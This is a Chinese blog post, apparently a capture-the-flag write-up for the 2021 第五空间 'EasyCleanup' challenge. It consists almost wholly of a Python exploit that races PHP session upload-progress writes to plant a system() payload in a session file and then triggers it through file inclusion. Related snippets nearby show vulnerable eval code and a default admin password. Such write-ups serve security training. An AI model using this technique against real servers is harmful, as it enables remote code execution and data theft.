[第五空间 2021]EasyCleanup

最新推荐文章于 2024-07-28 15:46:11 发布
最新推荐文章于 2024-07-28 15:46:11 发布
阅读量182 收藏
点赞数 1
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80113257/article/details/140069754
版权

临时文件

当session文件名是可控的时候,可以去指定目录下访问

Py脚本

 

# -*- coding: utf-8 -*-
import io
import requests
import threading
myurl = 'http://1.14.71.254:28893/'
sessid = '7t0'
myfile = io.BytesIO(b'hakaiisu' * 1024)
writedata = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('tac /nssctfasdasdflag');?>"}
mycookie = {'PHPSESSID': sessid}
def writeshell(session):
while True:
resp = requests.post(url=myurl, data=writedata, files={'file': ('hakaiisu.txt', 123)}, cookies=mycookie)
def getshell(session):
while True:
payload_url = myurl + '?file=' + '/tmp/sess_' +sessid
resp = requests.get(url=payload_url)
if 'upload_progress' in resp.text:
print(resp.text)
break
else:
pass
if __name__ == '__main__':
session = requests.session()
writeshell = threading.Thread(target=writeshell, args=(session,))
writeshell.daemon = True
writeshell.start()
getshell(session)

                

        

        

    




    

      

        

            

              
                
                  雪儿超人
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    1
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
2021第五空间网络安全大赛

				
			

			

				

					Huamang的博客
				

				

					09-17
					
					1181
					
				

			

		

		

			
				
WebFTP
https://github.com/wifeat/WebFTP
根据github的源码,去对网站进行分析,有写到初始账号

但是题目改了密码,登不进
然后下载到题目的Config.php.bak,看到版本是v2.3
出现了git泄漏,无法下载到文件,但是看到了目录结构
找到探针
http://114.115.185.167:32770/Readme/mytz.php

http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo
直接找到f

			
		

	



                

              
                



	

		

			

				
					
NSSCTF-第五空间2021-wp

				
			

			

				

					F1rstb100d
				

				

					09-24
					
					1132
					
				

			

		

		

			
				
NSSCTF-第五空间2021-wp

			
		

	



                


  
              

                


	

		

			

				
					
2021-第五空间智能安全大赛-Web-EasyCleanup

				
			

			

				

					qq_53863234的博客
				

				

					12-01
					
					1631
					
				

			

		

		

			
				
打开后看到源码:
<?php

if(!isset($_GET['mode'])){
    highlight_file(__file__);
}else if($_GET['mode'] == "eval"){
    $shell = $_GET['shell'] ?? 'phpinfo();';
    if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker");
    eval($shell)

			
		

	





	

		

			

				
					
[第五空间 2021] Web题解

				
			

			

				

					weixin_51804748的博客
				

				

					01-18
					
					4928
					
				

			

		

		

			
				
WebFTP

题目是一个网站管理工具WebFTP2011,上网搜索WebFTP,可以在github中找到这个项目,从README中获取初始用户名和密码

使用说明 1、初始账号 超级管理员 admin 密码 admin888


成功登陆后寻找服务器的网站目录,随便翻看有无可疑文件,最后在phpinfo中找到flag

EasyCleanup
<?php 
if(!isset($_GET['mode'])){ 
    highlight_file(__file__); 
}else if($_GE

			
		

	



		

			
		



	

		

			

				
					
2021 第五空间 ctf wp

				
			

			

				

					qq_45603443的博客
				

				

					09-23
					
					3006
					
				

			

		

		

			
				
2021 第五空间 ctf Misc签到alpha10BabyMiCryptoECCReverseuniappPwnbountyhunterCrazyVMWebEasyCleanuppklovecloudPNG图⽚转换器WebFTPyet_another_mysql_injection
Misc
签到
flag{welcometo5space}

alpha10
分离得到两个图⽚,⼀个jpg⼀个png,
两张图⼀样,想到可能是盲⽔印,
https://github.com/chishaxie/BlindWa

			
		

	





	

		

			

				
					
2021第五空间WEB

				
			

			

				

					~airrudder~
				

				

					02-24
					
					2972
					
				

			

		

		

			
				
2021第五空间web部分复现

			
		

	





	

		

			

				
					
[第五空间 2021]web 复现wp

				
			

			

				

					snowlyzz的博客
				

				

					09-13
					
					614
					
				

			

		

		

			
				
[第五空间 2021] wp

			
		

	





	

		

			

				
					
2021第五空间webakwp

				
			

			

				

					fmyyy1的博客
				

				

					09-18
					
					1094
					
				

			

		

		

			
				
前言
挺傻逼的,5道web题全是静态靶机,三道rce题,一直有人搅屎,不知道主办方咋想的。
附一张图

不过也算是ak了web 总体感觉还不错

webftp
这题就要说到搅屎的问题了,我直接扫路径扫到1.txt看到flag,大概是哪位大师傅放的

赛后跟别的师傅聊了一下,预期解是github上能下载源码然后看就行。
EasyCleanup
源码逻辑很简单,给了phpinfo和任意文件包含
这里的 session.upload_progress.cleanup 是off的,不会自动清除session文件
那

			
		

	





	

		

			

				
					
2021第五空间线上赛web wp

				
			

			

				

					cosmoslin的博客
				

				

					09-18
					
					645
					
				

			

		

		

			
				
pklovecloud
 <?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __c

			
		

	





	

		

			

				
					
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>

				
			

			

				

					qq_64603703的博客
				

				

					07-27
					
					729
					
				

			

		

		

			
				
详细解说数据分析pandas库中的常用方法

			
		

	





	

		

			

				
					
全网最详细Gradio教程系列5——Gradio Client: python

				
			

			

				

					shao918516的博客
				

				

					07-26
					
					1008
					
				

			

		

		

			
				
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:python、javascript和curl,受字数限制,所以分三篇博客发布。

使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。

通过Gradio Python Cli

			
		

	





	

		

			

				
					
全面解析 SnowNLP:中文文本处理、情感分析

				
			

			

				

					有勇气的牛排博客
				

				

					07-24
					
					585
					
				

			

		

		

			
				
SnowNLP 是一个专门用于处理中文文本的 Python库。分词情感分析关键词提取文本分类拼音转换繁体转简体词相似度计算等测试环境:Python3.10.9尚未测出该功能text = "有勇气的牛排写的文章通俗易懂,爱了爱了"文本分类使用的是 SnowNLP 的情感分析模型。

			
		

	





	

		

			

				
					
Chapter 18 Python异常

					
最新发布

				
			

			

				

					2302_80253507的博客
				

				

					07-28
					
					813
					
				

			

		

		

			
				
Python中,异常是一种特定的对象,能够在程序运行过程中被抛出和处理。有效地管理异常不仅可以增强程序的稳定性,还可以提高用户体验,使程序能够优雅地处理错误情况。本章详细讲解了异常的基本概念以及如何捕获和处理异常。

			
		

	





	

		

			

				
					
安卓手机部署大模型实战

				
			

			

				

					奇舞周刊
				

				

					07-25
					
					807
					
				

			

		

		

			
				
本文作者系360奇舞团前端开发工程师前言自ChatGPT发布以来,大语言模型(Large language model, LLM)就成了AI乃至整个计算机科学的话题中心。学术界,工业界围绕大语言模型本身及其应用展开了广泛的讨论,大量的新的实践层出不穷。由于LLM对计算资源的需求极大,有能力部署大语言模型的公司和实验室一般通过搭建集群,然后开放API或者网页demo的方式让用户可以使用模型。在人们纷...

			
		

	





	

		

			

				
					
Python数据增强】图像数据集扩充

				
			

			

				

					阿齐Archie
				

				

					07-25
					
					1921
					
				

			

		

		

			
				
该脚本用于图像数据增强,特别是目标检测任务中的图像和标签数据增强。通过应用一系列数据增强技术(如旋转、平移、裁剪、加噪声、改变亮度、cutout、翻转等),生成多样化的图像数据集,以提高目标检测模型的鲁棒性和准确性。

			
		

	





	

		

			

				
					
python语言利用Tkinter实现GUI计算器|(二)优化计算器:过滤用户不合理的输入

				
			

			

				

					人工智能视觉分析算法学习实践和经验分享。
				

				

					07-27
					
					592
					
				

			

		

		

			
				
python语言利用Tkinter实现GUI计算器|(二)优化计算器python语言利用Tkinter实现GUI计算器|(二)计算器打包。

			
		

	





	

		

			

				
					
Python】 基于Q-learning 强化学习的贪吃蛇游戏(源码+论文)【独一无二】

				
			

			

				

					测试开发自动化
				

				

					07-26
					
					1465
					
				

			

		

		

			
				
贪吃蛇环境模块:定义了游戏规则、状态空间、动作空间,并实现了环境的重置和步进逻辑。Q-learning 算法代理模块:实现了 Q-learning 算法,用于学习和决策游戏中的动作选择。游戏窗口模块:使用 Tkinter 创建图形界面展示游戏过程,并与环境和 Q-learning 代理进行交互。该设计使得贪吃蛇游戏能够通过强化学习算法进行自动训练,并通过图形界面展示训练过程。👉👉👉 源码获取 关注【测试开发自动化】公众号,回复 “ 强化贪吃蛇 ” 获取,拿来即用。👈👈👈。

			
		

	





	

		

			

				
					
第G2周:人脸图像生成(DCGAN)

				
			

			

				

					lihuhelihu的博客
				

				

					07-23
					
					1007
					
				

			

		

		

			
				
除了生成器模型的输出层和判别器模型的输入层,在整个对抗网络的其它层上都使用了Batch Normalization,原因是Batch Normalization可以稳定学习,有助于优化初始化参数值不良而导致的训练问题。通过这些层的组合,输入的图像逐渐被降维并提取特征,最终输出一个标量值,表示输入图像被判别为真实图像的概率。总体来说,这段代码实现了GAN的训练过程,通过交替更新判别器和生成器的参数,目标是使生成器生成逼真的图像样本,同时判别器能够准确区分真实图像样本和生成图像样本。

			
		

	





	

		

			

				
					
PythonPython化妆品评论贝叶斯情感分析可视化(源码+数据集)【独一无二】

				
			

			

				

					测试开发自动化
				

				

					07-28
					
					595
					
				

			

		

		

			
				
👉博__主👈:米码收割机👉技__能👈:C++/Python语言👉公众号👈:测试开发自动化【获取源码+商业合作】👉荣__誉👈:阿里云博客专家博主、51CTO技术博主👉专__注👈:专注主流机器人、人工智能等相关领域的开发、测试技术。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值